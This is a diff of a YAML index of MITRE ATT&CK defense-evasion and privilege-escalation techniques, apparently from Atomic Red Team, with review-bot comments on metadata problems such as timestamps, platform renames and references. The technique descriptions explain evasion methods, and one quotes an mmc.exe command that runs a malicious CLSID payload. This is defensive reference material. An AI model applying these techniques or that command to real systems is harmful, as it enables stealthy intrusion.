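Review bot: `modified` for T1564.001 moves backwards, from `2021-04-29T14:49:39.188Z` to `2020-03-29T22:32:25.985Z`, while the name and description in the surrounding context are unchanged; that means the generator is now reading `modified` from a different source than the previous run did (or the previous run stamped a later time), and anything that sorts, caches or reports "recently changed" techniques by this field will see a regression. Please confirm which value is authoritative and note it in the PR. Also visible in the unchanged context: the description breaks its line after `dir /a` and after `ls –a`, which is the trace of inline code markup being stripped, and `ls –a` carries an en dash rather than a hyphen, so the command as printed would not run if copied; both are worth handling in the markdown-to-YAML conversion.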
@@ -13676,48 +13964,11 @@ defense-evasion:
- Host forensic analysis
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1564.001
atomic_tests: []
T1578.001:
technique:
- x_mitre_platforms:
- - IaaS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Praetorian
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--ed2e45f9-d338-4eb2-8ce5-3a2e03323bc1
- type: attack-pattern
- created: '2020-06-09T15:33:13.563Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1578.001
- url: https://attack.mitre.org/techniques/T1578/001
- - source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
- description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
- 2020.
- - source_name: AWS Cloud Trail Backup API
- url: https://docs.aws.amazon.com/aws-backup/latest/devguide/logging-using-cloudtrail.html
- description: Amazon. (2020). Logging AWS Backup API Calls with AWS CloudTrail.
- Retrieved April 27, 2020.
- - source_name: Azure - Monitor Logs
- url: https://docs.microsoft.com/en-us/azure/backup/backup-azure-monitoring-use-azuremonitor
- description: Microsoft. (2019, June 4). Monitor at scale by using Azure Monitor.
- Retrieved May 1, 2020.
- - source_name: Cloud Audit Logs
- url: https://cloud.google.com/logging/docs/audit#admin-activity
- description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
- - source_name: GCP - Creating and Starting a VM
- url: https://cloud.google.com/compute/docs/instances/create-start-instance#api_2
- description: Google. (2020, April 23). Creating and Starting a VM instance.
- Retrieved May 1, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T15:53:44.870Z'
name: Create Snapshot
description: |-
An adversary may create a snapshot or data backup within a cloud account to evade defenses. A snapshot is a point-in-time copy of an existing cloud compute component such as a virtual machine (VM), virtual hard drive, or volume. An adversary may leverage permissions to create a snapshot in order to bypass restrictions that prevent access to existing compute service infrastructure, unlike in [Revert Cloud Instance](https://attack.mitre.org/techniques/T1578/004) where an adversary may revert to a snapshot to evade detection and remove evidence of their presence.
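Review bot: `x_mitre_attack_spec_version: 2.1.0` for T1564.001 is deleted at the top of this hunk together with `spec_version`, but unlike the T1578.001 keys deleted further down (which reappear in that technique's own block later in the patch) there is no `+` line restoring it anywhere visible for T1564.001, whose block now ends at `x_mitre_permissions_required`. If the field is gone entirely, consumers that check attack-spec compatibility per technique will find no version at all for this entry; please confirm it is re-emitted elsewhere in the block or document that techniques on the older 2.1.0 spec no longer carry the key.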
@@ -13726,6 +13977,9 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: |-
The creation of a snapshot is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities such as the creation of one or more snapshots and the restoration of these snapshots by a new user account.
@@ -13734,20 +13988,51 @@ defense-evasion:
In Azure, the creation of a snapshot may be captured in Azure activity logs. Backup restoration events can also be detected through Azure Monitor Log Data by creating a custom alert for completed restore jobs.(Citation: Azure - Monitor Logs)
Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of the gcloud compute instances create
command to create a new VM disk from a snapshot.(Citation: Cloud Audit Logs) It is also possible to detect the usage of the GCP API with the "sourceSnapshot":
parameter pointed to "global/snapshots/[BOOT_SNAPSHOT_NAME]
.(Citation: GCP - Creating and Starting a VM)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - IaaS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Snapshot: Snapshot Creation'
- 'Snapshot: Snapshot Metadata'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--ed2e45f9-d338-4eb2-8ce5-3a2e03323bc1
+ created: '2020-06-09T15:33:13.563Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1578/001
+ external_id: T1578.001
+ - source_name: AWS Cloud Trail Backup API
+ description: Amazon. (2020). Logging AWS Backup API Calls with AWS CloudTrail.
+ Retrieved April 27, 2020.
+ url: https://docs.aws.amazon.com/aws-backup/latest/devguide/logging-using-cloudtrail.html
+ - source_name: GCP - Creating and Starting a VM
+ description: Google. (2020, April 23). Creating and Starting a VM instance.
+ Retrieved May 1, 2020.
+ url: https://cloud.google.com/compute/docs/instances/create-start-instance#api_2
+ - source_name: Cloud Audit Logs
+ description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+ url: https://cloud.google.com/logging/docs/audit#admin-activity
+ - source_name: Mandiant M-Trends 2020
+ description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+ 2020.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+ - source_name: Azure - Monitor Logs
+ description: Microsoft. (2019, June 4). Monitor at scale by using Azure Monitor.
+ Retrieved May 1, 2020.
+ url: https://docs.microsoft.com/en-us/azure/backup/backup-azure-monitoring-use-azuremonitor
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1550.001:
technique:
- modified: '2024-04-12T21:18:28.848Z'
+ modified: '2024-10-15T15:38:11.583Z'
name: Application Access Token
description: "Adversaries may use stolen application access tokens to bypass
the typical authentication process and access restricted accounts, information,
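Review bot: The `Mandiant M-Trends 2020` reference changes its URL from the content.fireeye.com page to `https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf` but keeps `Retrieved April 24, 2020`, a date that predates the new path; a URL change should come with a refreshed retrieval date, as the other relocated references in this patch do. The rest of the hunk is the T1578.001 key reorder plus the `x_mitre_version` bump from `1.1` to `1.2` with `x_mitre_permissions_required` dropped, which is consistent with the newer spec.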
@@ -13804,6 +14089,7 @@ defense-evasion:
- Dylan Silva, AWS Security
- Jack Burns, HubSpot
- Blake Strom, Microsoft Threat Intelligence
+ - Pawel Partyka, Microsoft Threat Intelligence
x_mitre_deprecated: false
x_mitre_detection: 'Monitor access token activity for abnormal use and permissions
granted to unusual or suspicious applications and APIs. Additionally, administrators
@@ -13814,13 +14100,12 @@ defense-evasion:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Office 365
- SaaS
- - Google Workspace
- Containers
- IaaS
- - Azure AD
- x_mitre_version: '1.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.7'
x_mitre_data_sources:
- 'Web Credential: Web Credential Usage'
x_mitre_defense_bypassed:
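Review bot: The platform rename for T1550.001 (`Office 365`, `Google Workspace` and `Azure AD` replaced by `Office Suite` and `Identity Provider`, `x_mitre_version` 1.6 to 1.7) will silently drop this technique from any index, filter or report keyed on the old platform strings. Please confirm that the per-platform index generation and any documentation that enumerates platform names use the new vocabulary, and consider whether a one-line mapping from old to new names belongs in the changelog for consumers pinned to the old values.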
@@ -13879,11 +14164,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078.004:
technique:
- modified: '2024-03-29T15:42:13.499Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Cloud Accounts'
description: "Valid accounts in cloud environments may allow adversaries to
perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -13923,8 +14207,10 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jon Sternstein, Stern Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
or malicious behavior, such as accessing information outside of the normal
@@ -13932,13 +14218,13 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.7'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.8'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Logon Session: Logon Session Metadata'
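Review bot: The same platform consolidation applied here to T1078.004 (`Azure AD`, `Office 365`, `Google Workspace` out; `Office Suite`, `Identity Provider` in; version 1.7 to 1.8) matters more than for the techniques without tests, because this technique carries an atomic test (`Creating GCP Service Account and Service Account Key`, listed just below in the next hunk) and the platform list decides which per-platform index that test lands in. Please check that the test's own platform tags still resolve to an index after `Google Workspace` is no longer a platform on the technique.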
@@ -13969,9 +14255,6 @@ defense-evasion:
url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.004
atomic_tests:
- name: Creating GCP Service Account and Service Account Key
@@ -14149,7 +14432,7 @@ defense-evasion:
Similar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), adversaries may use environmental keying to help protect their TTPs and evade detection. Environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.(Citation: Kaspersky Gauss Whitepaper)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware)(Citation: Demiguise Guardrail Router Logo) By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult.(Citation: Kaspersky Gauss Whitepaper) This can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within.
Like other [Execution Guardrails](https://attack.mitre.org/techniques/T1480), environmental keying can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This activity is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of environmental keying will involve checking for an expected target-specific value that must match for decryption and subsequent execution to be successful.
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-04T14:52:51.290Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Environmental Keying
x_mitre_detection: Detecting the use of environmental keying may be difficult
@@ -14171,11 +14454,10 @@ defense-evasion:
- Static File Analysis
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1564.004:
technique:
- modified: '2024-02-14T21:56:34.831Z'
+ modified: '2024-09-12T15:27:29.615Z'
name: 'Hide Artifacts: NTFS File Attributes'
description: |-
Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. (Citation: SpectorOps Host-Based Jul 2017) Within MFT entries are file attributes, (Citation: Microsoft NTFS File Attributes Aug 2010) such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). (Citation: SpectorOps Host-Based Jul 2017) (Citation: Microsoft File Streams) (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)
@@ -14242,8 +14524,8 @@ defense-evasion:
Retrieved March 21, 2018.
url: https://blogs.technet.microsoft.com/askcore/2013/03/24/alternate-data-streams-in-ntfs/
- source_name: Microsoft File Streams
- description: Microsoft. (n.d.). File Streams. Retrieved December 2, 2014.
- url: http://msdn.microsoft.com/en-us/library/aa364404
+ description: Microsoft. (n.d.). File Streams. Retrieved September 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/fileio/file-streams
- source_name: Oddvar Moe ADS2 Apr 2018
description: Moe, O. (2018, April 11). Putting Data in Alternate Data Streams
and How to Execute It - Part 2. Retrieved June 30, 2018.
@@ -14261,7 +14543,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1564.004
atomic_tests: []
T1055.001:
@@ -14364,12 +14645,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1055.001
atomic_tests: []
T1556:
technique:
- modified: '2024-04-11T21:51:44.851Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Modify Authentication Process
description: |-
Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
@@ -14382,6 +14662,7 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Chris Ross @xorrior
x_mitre_deprecated: false
@@ -14418,17 +14699,17 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- Linux
- macOS
- Network
- - Azure AD
- - Google Workspace
- IaaS
- - Office 365
- SaaS
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Process: Process Access'
@@ -14474,9 +14755,6 @@ defense-evasion:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1216:
technique:
@@ -14514,7 +14792,7 @@ defense-evasion:
behavior may be abused by adversaries to execute malicious files that could
bypass application control and signature validation on systems.(Citation:
GitHub Ultimate AppLocker Bypass List)'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-18T14:43:46.045Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Signed Script Proxy Execution
x_mitre_detection: Monitor script processes, such as `cscript`, and command-line
@@ -14533,7 +14811,6 @@ defense-evasion:
- Digital Certificate Validation
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1216
atomic_tests: []
T1556.004:
@@ -14564,7 +14841,7 @@ defense-evasion:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2021-12-14T23:14:26.107Z'
name: Network Device Authentication
description: |-
Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
@@ -14588,12 +14865,10 @@ defense-evasion:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1574.004:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-03-30T21:01:39.601Z'
name: Dylib Hijacking
description: |-
Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with @rpath
, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable. Additionally, if weak linking is used, such as the LC_LOAD_WEAK_DYLIB
function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
@@ -14677,7 +14952,6 @@ defense-evasion:
url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
T1601.002:
technique:
@@ -14699,7 +14973,7 @@ defense-evasion:
url: https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices
description: Graham Holmes. (2015, October 8). Evolution of attacks on Cisco
IOS devices. Retrieved October 19, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T17:49:02.660Z'
name: Downgrade System Image
description: "Adversaries may install an older version of the operating system
of a network device to weaken security. Older operating system versions on
@@ -14733,12 +15007,10 @@ defense-evasion:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1078.003:
technique:
- modified: '2023-07-14T13:04:04.591Z'
+ modified: '2024-10-15T16:36:36.681Z'
name: 'Valid Accounts: Local Accounts'
description: "Adversaries may obtain and abuse credentials of a local account
as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -14790,9 +15062,8 @@ defense-evasion:
external_id: T1078.003
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.003
atomic_tests: []
T1211:
@@ -14861,7 +15132,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1127:
technique:
@@ -14908,7 +15178,7 @@ defense-evasion:
legitimate certificates that allow them to execute on a system and proxy execution
of malicious code through a trusted process that effectively bypasses application
control solutions.'
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-05T05:00:37.443Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Trusted Developer Utilities Proxy Execution
x_mitre_detection: |-
@@ -14921,12 +15191,13 @@ defense-evasion:
x_mitre_is_subtechnique: false
x_mitre_data_sources:
- 'Command: Command Execution'
+ - 'Module: Module Load'
+ - 'Process: Process Metadata'
- 'Process: Process Creation'
x_mitre_defense_bypassed:
- Application Control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1127
atomic_tests: []
T1218.014:
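Review bot: Two data sources (`'Module: Module Load'` and `'Process: Process Metadata'`) are added to T1127 while `x_mitre_attack_spec_version` stays at `2.1.0` and, in the preceding hunk, `modified` moves back from `2022-05-24T14:00:00.188Z` to `2022-05-05T05:00:37.443Z`. A content change paired with an older modification timestamp indicates the two fields are being read from different object versions; please confirm the source bundle for this technique so the timestamp and the data-source list describe the same revision.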
@@ -15005,7 +15276,7 @@ defense-evasion:
mmc_vulns) Once the .msc file is saved, adversaries may invoke the malicious
CLSID payload with the following command: mmc.exe -Embedding C:\\path\\to\\test.msc
.(Citation:
abusing_com_reg)"
- modified: '2022-10-25T14:00:00.188Z'
+ modified: '2022-05-20T17:41:16.112Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: MMC
x_mitre_detection: "Monitor processes and command-line parameters for suspicious
@@ -15027,7 +15298,6 @@ defense-evasion:
- Digital Certificate Validation
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1564.010:
technique:
@@ -15070,7 +15340,7 @@ defense-evasion:
url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2021-11-29T15:56:50.370Z'
name: Process Argument Spoofing
description: |-
Adversaries may attempt to hide process command-line arguments by overwriting process memory. Process command-line arguments are stored in the process environment block (PEB), a data structure used by Windows to store various information about/used by a process. The PEB includes the process command-line arguments that are referenced when executing the process. When a process is created, defensive tools/sensors that monitor process creations may retrieve the process arguments from the PEB.(Citation: Microsoft PEB 2021)(Citation: Xpn Argue Like Cobalt 2019)
@@ -15094,8 +15364,6 @@ defense-evasion:
- 'Process: Process Creation'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1574.012:
technique:
@@ -15143,7 +15411,7 @@ defense-evasion:
url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
Profilers. Retrieved June 24, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-30T21:35:12.049Z'
name: 'Hijack Execution Flow: COR_PROFILER'
description: |-
Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
@@ -15181,8 +15449,6 @@ defense-evasion:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1574.012
atomic_tests: []
privilege-escalation:
@@ -15231,7 +15497,7 @@ privilege-escalation:
description: Microsoft. (n.d.). SendNotifyMessage function. Retrieved December
16, 2017.
source_name: Microsoft SendNotifyMessage function
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.004Z'
name: 'Process Injection: Extra Window Memory Injection'
description: "Adversaries may inject malicious code into process via Extra Window
Memory (EWM) in order to evade process-based defenses as well as possibly
@@ -15283,29 +15549,28 @@ privilege-escalation:
x_mitre_defense_bypassed:
- Anti-virus
- Application control
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.011
atomic_tests: []
T1053.005:
technique:
- modified: '2023-11-15T14:33:53.354Z'
+ modified: '2024-10-13T16:13:47.770Z'
name: 'Scheduled Task/Job: Scheduled Task'
description: "Adversaries may abuse the Windows Task Scheduler to perform task
scheduling for initial or recurring execution of malicious code. There are
multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
utility can be run directly on the command line, or the Task Scheduler can
be opened through the GUI within the Administrator Tools section of the Control
- Panel. In some cases, adversaries have used a .NET wrapper for the Windows
- Task Scheduler, and alternatively, adversaries have used the Windows netapi32
- library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110)
- utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)),
- though at.exe
can not access tasks created with schtasks
- or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute
- programs at system startup or on a scheduled basis for persistence. The Windows
- Task Scheduler can also be abused to conduct remote Execution as part of Lateral
- Movement and/or to run a process under the context of a specified account
- (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
+ Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
+ wrapper for the Windows Task Scheduler, and alternatively, adversaries have
+ used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+ (WMI) to create a scheduled task. Adversaries may also utilize the Powershell
+ Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
+ create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
+ Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
+ system startup or on a scheduled basis for persistence. The Windows Task Scheduler
+ can also be abused to conduct remote Execution as part of Lateral Movement
+ and/or to run a process under the context of a specified account (such as
+ SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
adversaries have also abused the Windows Task Scheduler to potentially mask
one-time execution under signed/trusted system processes.(Citation: ProofPoint
Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
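Review bot: the rewritten T1053.005 description drops the sentence on the deprecated `at` utility, including its link to https://attack.mitre.org/techniques/T1053/002, without any replacement, so this entry no longer cross-references the At sub-technique; confirm that is the intended upstream text rather than a truncated merge of the old and new paragraphs. Minor: `Powershell Cmdlet` should read `PowerShell Cmdlet`, matching the casing used elsewhere in this file (for example the T1574.011 description).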
@@ -15352,7 +15617,7 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.5'
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Creation'
- 'File: File Modification'
@@ -15384,8 +15649,8 @@ privilege-escalation:
url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
- December 12, 2017.
- url: https://twitter.com/leoloobeek/status/939248813465853953
+ September 12, 2024.
+ url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Tarrask scheduled task
description: Microsoft Threat Intelligence Team & Detection and Response Team
. (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
@@ -15399,6 +15664,10 @@ privilege-escalation:
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
+ - source_name: Red Canary - Atomic Red Team
+ description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
+ Task/Job: Scheduled Task. Retrieved June 19, 2024.'
+ url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
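Review bot: the new `Red Canary - Atomic Red Team` reference points at `https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md`, i.e. this index now cites a file in its own repository on a moving branch; that is upstream ATT&CK's citation, but be aware that renaming the file or the default branch would break the link, so a commit-pinned URL would be more durable if it is ever edited here.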
@@ -15411,11 +15680,14 @@ privilege-escalation:
description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
Task - Registry. Retrieved June 1, 2022.
url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
+ - source_name: Stack Overflow
+ description: Stack Overflow. (n.d.). How to find the location of the Scheduled
+ Tasks folder. Retrieved June 19, 2024.
+ url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.005
atomic_tests: []
T1037:
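Review bot: `spec_version: '2.1'` is removed from the T1053.005 object here (and from nearly every other object in this patch) while `x_mitre_attack_spec_version` is kept; the objects still carry `type: attack-pattern` and STIX-style `id` values, so confirm that no consumer of this index reads `spec_version` before dropping it, or call out the generator change in the PR description so the removal is clearly deliberate.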
@@ -15481,7 +15753,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
